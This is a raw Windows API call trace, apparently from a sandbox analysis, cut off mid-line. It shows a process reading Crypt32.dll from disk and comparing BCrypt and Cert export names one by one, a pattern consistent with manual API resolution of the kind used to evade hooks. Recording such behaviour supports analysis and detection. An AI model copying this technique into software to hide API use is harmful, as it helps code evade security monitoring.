[0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0146.457] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0146.457] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0146.457] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0146.457] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0146.457] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0146.457] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0146.457] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0146.457] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0146.457] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0146.457] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0146.457] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0146.457] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0146.457] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0146.458] GetProcessHeap () returned 0x470000 [0146.458] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d92010 | out: hHeap=0x470000) returned 1 [0146.458] GetProcessHeap () returned 0x470000 [0146.458] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x489bf0 [0146.458] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0146.464] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0146.464] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0146.465] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0146.465] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0146.465] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0146.465] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0146.465] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0146.465] GetProcessHeap () returned 0x470000 [0146.465] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c30e0) returned 0x4150040 [0146.588] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0146.588] ReadFile (in: hFile=0x160, lpBuffer=0x4150040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4150040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0146.919] CloseHandle (hObject=0x160) returned 1 [0146.919] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0146.919] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0146.919] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0146.919] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0146.919] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0146.919] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0146.919] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0146.920] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0146.920] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0146.920] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0146.920] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0146.920] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0146.920] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0146.920] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0146.920] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0146.920] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0146.920] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0146.920] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0146.920] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0146.920] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0146.920] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0146.920] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0146.920] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0146.920] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0146.920] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0146.920] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0146.920] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0146.920] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0146.920] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0146.920] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0146.920] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0146.920] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0146.920] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0146.920] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0146.921] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0146.921] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0146.921] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0146.921] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0146.921] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0146.921] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0146.921] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0146.921] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0146.921] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0146.921] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0146.921] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0146.921] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0146.921] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0146.921] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0146.921] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0146.921] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0146.921] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0146.921] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0146.921] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0146.921] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0146.921] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0146.922] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0146.922] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0146.922] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0146.922] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0146.922] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0146.922] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0146.922] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0146.922] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0146.922] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0146.922] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0146.922] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0146.922] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0146.922] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0146.922] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0146.922] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0146.922] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0146.922] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0146.922] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0146.922] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0146.922] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0146.922] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0146.922] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0146.922] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0146.923] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0146.923] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0146.923] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0146.923] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0146.923] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0146.923] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0146.923] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0146.923] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0146.923] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0146.923] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0146.923] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0146.923] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0146.923] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0146.923] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0146.923] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0146.923] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0146.923] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0146.923] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0146.923] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0146.923] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0146.923] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0146.923] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0146.923] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0146.923] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0146.923] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0146.924] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0146.924] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0146.924] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0146.924] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0146.924] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0146.924] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0146.924] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0146.924] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0146.924] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0146.924] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0146.924] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0146.924] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0146.924] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0146.924] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0146.924] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0146.924] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0146.924] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0146.924] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0146.924] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0146.924] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0146.924] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0146.924] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0146.924] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0146.924] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0146.925] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0146.925] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0146.925] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0146.925] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0146.925] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0146.925] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0146.925] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0146.925] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0146.925] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0146.925] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0146.925] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0146.925] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0146.925] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0146.925] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0146.925] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0146.925] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0146.925] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0146.925] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0146.925] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0146.925] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0146.925] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0146.925] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0146.925] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0146.925] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0146.925] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0146.925] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0146.925] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0146.925] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0146.925] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0146.925] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0146.925] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0146.926] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0146.926] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0146.927] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0146.927] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0146.927] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0146.927] lstrcmpA 